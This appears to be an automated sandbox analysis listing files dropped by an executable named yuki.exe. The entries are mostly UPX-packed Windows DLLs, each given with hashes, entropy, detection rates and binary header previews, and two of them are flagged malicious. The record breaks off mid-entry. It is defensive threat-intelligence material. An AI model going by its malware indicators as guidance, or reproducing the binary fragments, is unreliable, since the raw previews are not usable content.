                                                                                                    MD5:875F67D1C1F22890C9F4A480A81514B2
                                                                                                    SHA1:B8DAE4690F74E80AA498879CB90D687C6DDFA155
                                                                                                    SHA-256:5C7850C9DA6DCF0401C87BAAA798E8D185D3CB698C01A4887A128B6FFABE6FDA
                                                                                                    SHA-512:BDA286C31F3A207BB564372766F9531AE8AF6A70857DDF0022107155D6FEA7CC920E50AAE5C37605A03E175C1E5EFB1153BB02A3790965CF2EB0548281B656D6
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d....B.f.........." ..... .......p........................................................`.........................................T..........d............P..........................................................8...........................................UPX0.....p..............................UPX1..... ....... ..................@....rsrc................$..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):6.848589271557058
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:cZ1CChUEjQPmO8HCD/yQEVJLflLfB1fdHrkYj273QJX8nEJ:fJ6A9IJLdfB1fdHrZa7gJX3
                                                                                                    MD5:376E3926BF4C1019C24EB79A6FFE4641
                                                                                                    SHA1:89EF367F3C4C67A92D4B11E586C7FB4A1FBFFDB0
                                                                                                    SHA-256:0D821A22253F86B5E038F9AC984A96F0C722CA6F88F5839CA9CF6D9D5ED6F3E5
                                                                                                    SHA-512:E3C7234CB92B79EE08EB4FF454EB7FCCF779A5F6A10D34E2653C5B1CD5FABDB4DAF28800D1F009D6FC1CF2612D4DAE328392D044D9B91EB73C00FAE123874D75
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d....B.f.........." .....0.......p..0.....................................................`.........................................L..........\............P..X...............$...................................0...8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12288
                                                                                                    Entropy (8bit):7.01917247207309
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:zu1oHdD3VpsdrqkCphVavitay5xyvCBfd9Gkmy7jrkYj273QJX0nJ7:R3fKTCxavinyaZes7jrZa7gJXG
                                                                                                    MD5:B97CBAC01C36E1B10A950F363CAF103C
                                                                                                    SHA1:DD308277D7E59E009B7611B7147A57CDEA1BDD5A
                                                                                                    SHA-256:7BF3D6A3ABA2139870578F295BDEF5E92F03BD6D0EA395EF75006E2403DD36C8
                                                                                                    SHA-512:DED8C18DAF4A0203F0A4BFCBFCF93948B54C5D312AB8727EB89D4EBB9C9C57CFFC18EA92ACF93F0C8CF83F73CBDA1F00D550860FBF6875CFD1249C04D60595D2
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0.......p.......................................................`.........................................L..........\............P..X...........@..........................................8...........................................UPX0.....p..............................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11776
                                                                                                    Entropy (8bit):7.0318442071811935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:h6D17kMnWzpM3mXoEdh29xFeOSegQtNkYj273QJXtnME:hHMWzpMWXoEbFOSegQtNZa7gJXu
                                                                                                    MD5:C6D85BE27EDCEEF3D644862F57DBDAC4
                                                                                                    SHA1:BD40CC62BFBFB739E317C773426F8B76EAD3EC60
                                                                                                    SHA-256:7646318391671E53ADC1E460BDC3A01A2A0F7EA8FE6AABD518638E8915809B04
                                                                                                    SHA-512:FB77CF7CA1E44C37D1134F27368CFEF960F06C407367F2253B0CD1A667C123B6544D8E6F97F0F00C9FEAA238EBD7A97DC4CCA398D052800149889045D5C79D6F
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..|.......................................................8...........................................UPX0.....p..............................UPX1.....0.......&..................@....rsrc................*..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20480
                                                                                                    Entropy (8bit):7.582798540061785
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:xCPYY2Eqk95s92Jd5yYA2ocvSmO8wapXyxIgTeS488UuOZa7gJXx:8wY2pk9dHKWvSlDQcI1KHph
                                                                                                    MD5:6CD325DA5C7A262E9DF46BF0DB031C94
                                                                                                    SHA1:CF414B5463E80FD3E50F35DD348E89DB1EE0C792
                                                                                                    SHA-256:B68A478487369BBE5410931DB02DEFC159C2CE32BFE49A2686BEE7D60B0994CD
                                                                                                    SHA-512:E7065D81A0DCA418C3746266530029E3280CCD2287B5260885C11EAC5A769480938BB009517D865DBD336644D0D3103B9A3A61C9B22C476875328CE2A275036C
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d....B.f.........." .....P.......... .....................................................`.........................................L...|.......\...............<................................................... ...8...........................................UPX0....................................UPX1.....P.......H..................@....rsrc................L..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10240
                                                                                                    Entropy (8bit):6.781528095877668
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:rE1QdqOkpEh83hgAXfW2OAAhpZwkYj273QJX43Oyb:rPqO+Eh8xgAX+2OZPwZa7gJXV
                                                                                                    MD5:FF2676B925D79778F1F1F8C4B310C32E
                                                                                                    SHA1:B87400CCDF1F579E6AAF663610E9833828FE4C9A
                                                                                                    SHA-256:324CEDEA6443960781DEF946D52B7097F6E36EDA9C53A70EA084B30E9A4E16C3
                                                                                                    SHA-512:2FDF426781D576A6AC8E697EB1972A81D9EA57B0015851DC188CC9CEDFAE613B09D4978583F1365CF3DDD42C0911FC3C2998237B7B622F164B6F09DDE8087C93
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d....B.f.........." ..... .......p........................................................`.........................................L...d......\............P..4.......................................................8...........................................UPX0.....p..............................UPX1..... ....... ..................@....rsrc................$..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14336
                                                                                                    Entropy (8bit):7.2659734254328745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:XNdFl9xgCYsB43vddIU5PU7XBtKZI0TWTMxpfEVt5jhjBDbvDkYj273QJXO3R2A:XNdQPj3vdJ87fWT3xy193DZa7gJXA2
                                                                                                    MD5:102777C103C67B7661BD9FF4A32D21F0
                                                                                                    SHA1:0A8E547C23F577865EB1B39A4501F1C60564F19A
                                                                                                    SHA-256:DCE2E49EBD670F036E5BBFAA7101BE4597B7C71A8D544DCC58F3AC920492A376
                                                                                                    SHA-512:CF6A287535C20229071447B9617A33301968142C456E6E1950EE0828B44807963237A404719603301C505B3E81E7DE980CB9112FE015CA7E18C16F83CEC64421
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." .....0..........P.....................................................`.........................................L...........\............p..............L.......................................P...8...........................................UPX0....................................UPX1.....0.......0..................@....rsrc................4..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26624
                                                                                                    Entropy (8bit):7.7091768623692705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:NGkgn0uw0f9tuMgZj6SgoM+mHh8zBhOsgpS:Qk60qf1SxM+Sh8zBZV
                                                                                                    MD5:BE200409DA5622C3F060A683A5F3D417
                                                                                                    SHA1:B0E69D75630549C9F1CA74DAA830BD7382421E81
                                                                                                    SHA-256:22E148FDF281F3A7DBD3EBB13F8F637B7791173DBB472F1B2FA3D954D46993AD
                                                                                                    SHA-512:740B487546FECF7AE2304A00F1017BEEB13E229371A92E7EED31779701B96F63FBE2E3F51057447FC8298F2B932466358BF2A3BB835E7BACF0E2C60A0627C5AC
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d....B.f.........." .....`..........Pa....................................................`.........................................Lr..0....p..\....p....... ..$...........|s......................................Pm..8...........................................UPX0....................................UPX1.....`.......`..................@....rsrc........p.......d..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):640000
                                                                                                    Entropy (8bit):7.99870484556712
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:TIahn0k2jt5j5hjcFCGQNKQ8J2NWqZxjYDHJrX2cQ6GFlBg+cogRfG9jU:z0fX9pcXO/NWixjYrJdCHqVVsZU
                                                                                                    MD5:B3930E1BFD96489CC991B5A06A8F6407
                                                                                                    SHA1:21591BD093D9318F7D4EC569B34CA0BB785551AB
                                                                                                    SHA-256:DCE41C5CD6647B3F4EA933E7B6A325684B61B96202A079E98DB06E20DAB3F5B7
                                                                                                    SHA-512:E434309E84CA50C1BF70524D84C1A3C90054E308A41ECC07E0BB09FE1EECFB87595CE8028BBADD1AC76545F8F1037BE354EB7957FD3EA0F8CB60B9F455EEFBB8
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.. .. .. ... .. ..!.. ..!.. .. .. ..!.. ..!.. ..!.. \..!.. \..!.. \.r .. \..!.. Rich.. ................PE..d....B.f.........." .............`.......p...................................@............`.........................................L2..h....0..\....0.......................3.......................................*..8...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15872
                                                                                                    Entropy (8bit):7.366227235042746
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:PGBfc1QlWR3bEsLMf6Ufn10euzGZa7gJXN1m:PGkQN6awKpd1m
                                                                                                    MD5:89ED1AD3B5457EDF07A23AAE74B56595
                                                                                                    SHA1:3D4389DCB2D47EA4F991FB82AA9D62914A88F0B9
                                                                                                    SHA-256:F98056C564B2B353C97C6657F1AC55BE86A97E84A036718E8702ADACCD238643
                                                                                                    SHA-512:60695105017822B8FD0E4F57257113836CE21AB515F12447F95696AFCD62A86F2E46496C0F53A5C4AB0AAA9997802DD690BD1BE0F3365A21CDA52ABC77834370
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....@..........@.....................................................`.........................................L...0.......\...........................|.......................................@...8...........................................UPX0....................................UPX1.....@.......6..................@....rsrc................:..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28672
                                                                                                    Entropy (8bit):7.764205395498449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yYWTbll1RIaPUAc5BjOxy2VANd9N/Q6/HgnhkX4ts6HGZa7gJX7AgM:zablfRBPUAc3j32VANdTQ6fzX4twprA
                                                                                                    MD5:057EAAFC435CFA276644E53A2AE1B8BF
                                                                                                    SHA1:594190621E521826A13C0AE33EB41A78F55E687E
                                                                                                    SHA-256:66C3FEA141B1B9FEF04A54CB4452B36D4CB9A201F52173E684301164993E99A8
                                                                                                    SHA-512:47DEFE33532228601D63D6577D51BDE6F362C6510C752717F8632B6C20B536F74D13A55D8CA8B0D8DF6D2A00B084D34086D1E56C9ED0152CB2AA6DBF71C3071F
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d....B.f.........." .....p.......@......P................................................`.........................................L...h.......\............`..l......................................................8...........................................UPX0.....@..............................UPX1.....p...P...h..................@....rsrc................l..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9216
                                                                                                    Entropy (8bit):6.7044520903294025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:p51jwkl3nSW/TftRVw61csNba5NkYj273QJXpHj:p5CkwWbft0rsc5NZa7gJXJ
                                                                                                    MD5:6583A780CA8E489DD8FFE2CB5440646D
                                                                                                    SHA1:ADE364CF1D5C42D390CFC19954AF6AE1C2A34534
                                                                                                    SHA-256:5D7C6EA038B25C47442E2DD22353E85FFAF1E2F35F3186097396BEFEC9B69067
                                                                                                    SHA-512:DAE0DA68DD9A16EF02EB9F369F7BA9F482691CBD0A870AC893736E01C5B401137B861959451D8C7F6792445A7D98E3B7EEE4EC1F116549AA09E2AA93CD516C86
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d....B.f.........." ..... .......p..p.....................................................`.............................................|...................@..............|.......................................p...8...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc................ ..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9216
                                                                                                    Entropy (8bit):6.701511658704808
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:0AhKeeuBxm0jMuCicColTjCBhXkYj273QJXEHj:0AhxpgTSBhXZa7gJXw
                                                                                                    MD5:6E1535927EA0388C536F2D3ACF9E520A
                                                                                                    SHA1:E42176C263887054F04B8FEE7FD3F6B5989EAC6C
                                                                                                    SHA-256:E30237D613923C5E47BB12BEFEB6FB835B13A4B8E0853A2569A3F61B750302E5
                                                                                                    SHA-512:61859741A6C6957CED56EAED2567D274B2F39479FB1C99F985730A1ED1A8C394BCC49F1D513111354BD1DC092902FEB1DEAD13DA3698459CA88F87E42A9B1DB8
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d....B.f.........." ..... .......p..p.....................................................`.............................................t...................@..............t.......................................p...8...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc................ ..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):761344
                                                                                                    Entropy (8bit):7.998137449024628
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:ko0ZsydSvIV69l1Du2eNfDJr2QbDj/ju+F3hOyjelmsmWrv65GHXWmQgRte7dlaR:kpZsydk59zi2e5wQbP/3Cyjsm0vAskE4
                                                                                                    MD5:3633E0248F6F931A0C523C1754696122
                                                                                                    SHA1:92274CD119B8879D7CC01C0B22EB1CE489EE14C9
                                                                                                    SHA-256:64BF1FFA7B1DBAD841E0949B2FA9D3760FF43941B1D33D2D605DC4EE197BA033
                                                                                                    SHA-512:B266357D293295C1D46E99C21BC8197BC9D17F40311162553128EA85F0B8416DC8EDA9083FD60E4BDC848E532E8ACD11329E992D2A5D5EC0A9FCC7758CB21480
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6...XK..XK..XK...K..XK..YJ..XK...K..XK..[J..XK..\J..XK..]J..XK..YJ..XK..YJ..XK..YK..XK..XK..XK..\J..XK..PJ..XK..XJ..XK...K..XK..ZJ..XKRich..XK........PE..d......g.........." ...).............t$.......................................$...........`...........................................$.`....$.......$...... #............. .$. .............................$.(....$.@...........................................UPX0....................................UPX1................................@....rsrc.........$.....................@......................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98816
                                                                                                    Entropy (8bit):7.951335483683929
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:uUp/4AvpqEz/ycNBYX040UM2ufs6hysaz9qPIUvz9OD7PtjMRnrVO:7p/jvppLycNekJB2uxyssWI8kKRM
                                                                                                    MD5:07B21031D5F61DC6BB5A23EEC8ED7AFA
                                                                                                    SHA1:F6C60DC8C36387D0714DBE690375F68A210314B9
                                                                                                    SHA-256:482DA69723AFF48D763CE83F4F3F5CE67913A41982BD1BC7608152E868679CA1
                                                                                                    SHA-512:884A24B2F9D498ED839818F372CC1350E8D69F733FFC9D762D22142544E001BFD5CBBB44387DDA7401F781868F96DF2FBFE9172AC885D40058EB9D3E99A2685D
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.3_.r]..r]..r]......r]...\..r]...^..r]...Y..r]...X..r].P.\..r].S.\..r]..r\.hr].P.U..r].P.]..r].P....r].P._..r].Rich.r].........PE..d......g.........." ...)............`Y....................................................`.........................................|t..h....p.......p.........../...........t......................................`e..@...........................................UPX0....................................UPX1.............x..................@....rsrc........p.......|..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13312
                                                                                                    Entropy (8bit):7.268456642905388
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:l79SXKiik04i3p5Ll0iT4hK0G2J2nnp+jkYj273QJX7HaPmg:lRS/Qh0is00GU2nnp+jZa7gJX2Pm
                                                                                                    MD5:4031DA48FFAAF3FF8082324CFAB65B38
                                                                                                    SHA1:3FEECCECA82CA8433A9F5D9495EF1FD25BA1FEA9
                                                                                                    SHA-256:113BDB5BF34B4487C6E1416C618D7DF1156EAF008EDFFB57CC1CCE5769F68600
                                                                                                    SHA-512:DF6C432F482333AD38F5EC039DD7415340BD33B12E158F75A4CAEA9C47416C98F8E85783204874E5049E960E6F25F11CA693B1463A400C17D82F4C666BBDF1A5
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......rJ.]6+..6+..6+..?S..2+..&...4+..}S..4+..&...5+..&...>+..&...:+..~...5+..6+...+..~...7+..~...7+..~.i.7+..~...7+..Rich6+..................PE..d......g.........." ...).0..........`.....................................................`.............................................h.......................h...................................................`...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12288
                                                                                                    Entropy (8bit):6.915668228186661
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:x8z3beKTrVeko1VATfR4D+IPA7Y4pXkYj273QJXbHaP55KdrX1:xG3beUrLo1eTfRJYOXZa7gJXq55KdrX
                                                                                                    MD5:534058D03A7D553FA87AC656C1E7825B
                                                                                                    SHA1:C02E1F182EED55289282B92FF8E5BAF02DC19FE9
                                                                                                    SHA-256:DF9848AA23AC86B97DC7EE07D5CE70C60042919EE388D94AE87D014C60E0A734
                                                                                                    SHA-512:1DABBB242D9A7EB2F213366C5F3B7B192AB5666F9F54C7C6DF335004BC8A9731F2256D82DD519A45E47F04F88152127BA801DE9BBCF68A85DF0D360120FEE117
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>D.rmD.rmD.rmM..mN.rmTislF.rmTiqlG.rmTivlL.rmTiwlH.rm.hslF.rm..slA.rmD.sm|.rm.hzlF.rm.hrlE.rm.h.mE.rm.hplE.rmRichD.rm................PE..d......g.........." ...).0................................................................`.............................................d....................`..............,...........................................@...........................................UPX0....................................UPX1.....0.......&..................@....rsrc................*..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):179712
                                                                                                    Entropy (8bit):7.984610367985582
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:eTeuVm4HqVAdJVl9J7U9zKeM7ej7D3/f7j27XNzL5thmlUjZcSjQRG3/AcE:ejmkVzVX1UIf7ezmXNP3hgcE
                                                                                                    MD5:FDCEC1A545C513F31A21CEBA099DC104
                                                                                                    SHA1:8EDF6D6BE51E5E04E790F7129A3AC622970838EA
                                                                                                    SHA-256:20ADC042F5BF294EF6A8B563CB72191E607C6D45FBA8A5E9F56B064D68134D6D
                                                                                                    SHA-512:09FA04F282826EBD4AED4AEAACB9D9CB2FDEEE36D8C897F44CC43DCE3913C752D226C2C8B901FA0D6DA60C7A3F2E83E7207CDA123880D530BE1C020F0FC033E0
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...rr.Wrr.Wrr.W{..Wxr.Wb..Vpr.W9..Vpr.Wb..Vvr.Wb..Vzr.Wb..V.r.W:..Vqr.Wrr.W*r.W:..V%r.W:..Vsr.W:..Vsr.W:.cWsr.W:..Vsr.WRichrr.W........PE..d......g.........." ...)............0.... ................................................`.........................................x...\....................P...;..................................................0...@...........................................UPX0....................................UPX1......... ......................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):119192
                                                                                                    Entropy (8bit):6.6016214745004635
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                    MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                    SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                    SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                    SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49528
                                                                                                    Entropy (8bit):6.662491747506177
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                    MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                    SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                    SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                    SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38680
                                                                                                    Entropy (8bit):7.71307535968844
